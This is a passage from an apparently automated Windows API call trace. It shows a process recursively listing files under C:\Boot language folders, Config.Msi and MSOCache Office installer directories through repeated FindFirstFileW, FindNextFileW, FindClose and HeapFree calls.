hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.695] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fi-FI\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa284f8 [0132.695] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.695] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.695] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0 [0132.695] FindClose (in: hFindFile=0xa284f8 | out: hFindFile=0xa284f8) returned 1 [0132.695] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2297a80 | out: hHeap=0x20f0000) returned 1 [0132.695] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.695] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\Fonts\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa284f8 [0132.695] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.695] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.696] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.696] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.696] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.696] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.696] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0 [0132.696] FindClose (in: hFindFile=0xa284f8 | out: hFindFile=0xa284f8) returned 1 [0132.696] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2297a80 | out: hHeap=0x20f0000) returned 1 [0132.696] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.696] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fr-FR\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa284f8 [0132.696] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.696] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.696] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0 [0132.696] FindClose (in: hFindFile=0xa284f8 | out: hFindFile=0xa284f8) returned 1 [0132.696] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2297a80 | out: hHeap=0x20f0000) returned 1 [0132.696] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.696] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\hu-HU\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa284f8 [0132.697] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.697] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.697] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0 [0132.697] FindClose (in: hFindFile=0xa284f8 | out: hFindFile=0xa284f8) returned 1 [0132.697] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2297a80 | out: hHeap=0x20f0000) returned 1 [0132.697] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.697] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\it-IT\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa284f8 [0132.697] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.697] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.697] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0 [0132.697] FindClose (in: hFindFile=0xa284f8 | out: hFindFile=0xa284f8) returned 1 [0132.697] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2297a80 | out: hHeap=0x20f0000) returned 1 [0132.697] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.697] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ja-JP\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa284f8 [0132.697] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.697] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.697] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0 [0132.697] FindClose (in: hFindFile=0xa284f8 | out: hFindFile=0xa284f8) returned 1 [0132.698] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2297a80 | out: hHeap=0x20f0000) returned 1 [0132.698] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.698] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ko-KR\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa284f8 [0132.698] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.698] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.698] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0 [0132.698] FindClose (in: hFindFile=0xa284f8 | out: hFindFile=0xa284f8) returned 1 [0132.698] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2297a80 | out: hHeap=0x20f0000) returned 1 [0132.698] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.698] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.698] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nb-NO\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa284f8 [0132.698] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.698] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.698] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0 [0132.698] FindClose (in: hFindFile=0xa284f8 | out: hFindFile=0xa284f8) returned 1 [0132.698] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2297a80 | out: hHeap=0x20f0000) returned 1 [0132.698] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.699] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nl-NL\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa284f8 [0132.699] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.699] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.699] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0 [0132.699] FindClose (in: hFindFile=0xa284f8 | out: hFindFile=0xa284f8) returned 1 [0132.699] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2297a80 | out: hHeap=0x20f0000) returned 1 [0132.699] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.699] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pl-PL\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa284f8 [0132.699] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.699] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.699] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0 [0132.699] FindClose (in: hFindFile=0xa284f8 | out: hFindFile=0xa284f8) returned 1 [0132.699] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2297a80 | out: hHeap=0x20f0000) returned 1 [0132.699] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.699] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-BR\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa284f8 [0132.699] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.699] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.700] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0 [0132.700] FindClose (in: hFindFile=0xa284f8 | out: hFindFile=0xa284f8) returned 1 [0132.700] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2297a80 | out: hHeap=0x20f0000) returned 1 [0132.700] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.700] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-PT\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa284f8 [0132.700] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.700] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.700] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0 [0132.700] FindClose (in: hFindFile=0xa284f8 | out: hFindFile=0xa284f8) returned 1 [0132.700] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2297a80 | out: hHeap=0x20f0000) returned 1 [0132.700] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.700] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ru-RU\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa284f8 [0132.700] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.700] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.700] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0 [0132.700] FindClose (in: hFindFile=0xa284f8 | out: hFindFile=0xa284f8) returned 1 [0132.701] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2297a80 | out: hHeap=0x20f0000) returned 1 [0132.701] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.701] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\sv-SE\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa284f8 [0132.701] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.701] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.701] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0 [0132.701] FindClose (in: hFindFile=0xa284f8 | out: hFindFile=0xa284f8) returned 1 [0132.701] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2297a80 | out: hHeap=0x20f0000) returned 1 [0132.701] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.701] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\tr-TR\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa284f8 [0132.701] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.701] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.701] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0 [0132.702] FindClose (in: hFindFile=0xa284f8 | out: hFindFile=0xa284f8) returned 1 [0132.702] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2297a80 | out: hHeap=0x20f0000) returned 1 [0132.702] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.702] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-CN\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa284f8 [0132.702] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.702] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.702] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0 [0132.702] FindClose (in: hFindFile=0xa284f8 | out: hFindFile=0xa284f8) returned 1 [0132.702] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2297a80 | out: hHeap=0x20f0000) returned 1 [0132.702] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.702] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-HK\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa284f8 [0132.702] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.702] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.702] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0 [0132.702] FindClose (in: hFindFile=0xa284f8 | out: hFindFile=0xa284f8) returned 1 [0132.702] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2297a80 | out: hHeap=0x20f0000) returned 1 [0132.702] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.702] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-TW\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa284f8 [0132.703] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.703] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.703] FindNextFileW (in: hFindFile=0xa284f8, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0 [0132.703] FindClose (in: hFindFile=0xa284f8 | out: hFindFile=0xa284f8) returned 1 [0132.703] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2297a80 | out: hHeap=0x20f0000) returned 1 [0132.703] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 0 [0132.703] FindClose (in: hFindFile=0xa284b8 | out: hFindFile=0xa284b8) returned 1 [0132.703] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2287a78 | out: hHeap=0x20f0000) returned 1 [0132.703] FindNextFileW (in: hFindFile=0xa28478, lpFindFileData=0x2b4f8f8 | out: lpFindFileData=0x2b4f8f8) returned 1 [0132.703] FindNextFileW (in: hFindFile=0xa28478, lpFindFileData=0x2b4f8f8 | out: lpFindFileData=0x2b4f8f8) returned 1 [0132.703] FindNextFileW (in: hFindFile=0xa28478, lpFindFileData=0x2b4f8f8 | out: lpFindFileData=0x2b4f8f8) returned 1 [0132.703] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Config.Msi\\*", lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 0xa284b8 [0132.703] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.703] FindNextFileW (in: hFindFile=0xa284b8, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 0 [0132.703] FindClose (in: hFindFile=0xa284b8 | out: hFindFile=0xa284b8) returned 1 [0132.703] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2287a78 | out: hHeap=0x20f0000) returned 1 [0132.703] FindNextFileW (in: hFindFile=0xa28478, lpFindFileData=0x2b4f8f8 | out: lpFindFileData=0x2b4f8f8) returned 1 [0132.703] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Documents and Settings\\*", lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 0xffffffff [0132.704] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2287a78 | out: hHeap=0x20f0000) returned 1 [0132.704] FindNextFileW (in: hFindFile=0xa28478, lpFindFileData=0x2b4f8f8 | out: lpFindFileData=0x2b4f8f8) returned 1 [0132.704] FindNextFileW (in: hFindFile=0xa28478, lpFindFileData=0x2b4f8f8 | out: lpFindFileData=0x2b4f8f8) returned 1 [0132.704] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\*", lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 0xa28e48 [0132.739] FindNextFileW (in: hFindFile=0xa28e48, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.739] FindNextFileW (in: hFindFile=0xa28e48, lpFindFileData=0x2b4f674 | out: lpFindFileData=0x2b4f674) returned 1 [0132.739] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\*", lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 0xa28e88 [0132.742] FindNextFileW (in: hFindFile=0xa28e88, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.743] FindNextFileW (in: hFindFile=0xa28e88, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.743] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa28ec8 [0132.746] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0132.746] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0132.746] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0132.746] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0132.746] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0132.746] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0132.746] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0132.746] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0 [0132.746] FindClose (in: hFindFile=0xa28ec8 | out: hFindFile=0xa28ec8) returned 1 [0132.747] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0132.747] FindNextFileW (in: hFindFile=0xa28e88, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.747] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa28ec8 [0132.753] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0132.753] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0132.754] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0132.762] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0132.762] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0132.762] FindNextFileW (in: hFindFile=0xa28ec8, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0 [0132.762] FindClose (in: hFindFile=0xa28ec8 | out: hFindFile=0xa28ec8) returned 1 [0132.762] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0132.762] FindNextFileW (in: hFindFile=0xa28e88, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0132.762] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa2e408 [0133.271] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0133.271] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0133.271] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0133.274] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0133.274] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0133.277] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0 [0133.277] FindClose (in: hFindFile=0xa2e408 | out: hFindFile=0xa2e408) returned 1 [0133.277] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0133.277] FindNextFileW (in: hFindFile=0xa28e88, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0133.277] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa2e408 [0133.507] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0133.507] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0133.508] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0133.508] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0133.515] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0133.515] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0 [0133.515] FindClose (in: hFindFile=0xa2e408 | out: hFindFile=0xa2e408) returned 1 [0133.515] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0133.515] FindNextFileW (in: hFindFile=0xa28e88, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0133.515] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa2e778 [0133.526] FindNextFileW (in: hFindFile=0xa2e778, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0133.526] FindNextFileW (in: hFindFile=0xa2e778, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0133.526] FindNextFileW (in: hFindFile=0xa2e778, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0133.526] FindNextFileW (in: hFindFile=0xa2e778, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0133.526] FindNextFileW (in: hFindFile=0xa2e778, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0133.526] FindNextFileW (in: hFindFile=0xa2e778, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0 [0133.526] FindClose (in: hFindFile=0xa2e778 | out: hFindFile=0xa2e778) returned 1 [0133.526] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32d0058 | out: hHeap=0x20f0000) returned 1 [0133.526] FindNextFileW (in: hFindFile=0xa28e88, lpFindFileData=0x2b4f3f0 | out: lpFindFileData=0x2b4f3f0) returned 1 [0133.526] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 0xa2e408 [0133.703] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0133.703] FindNextFileW (in: hFindFile=0xa2e408, lpFindFileData=0x2b4f16c | out: lpFindFileData=0x2b4f16c) returned 1 [0133.703] 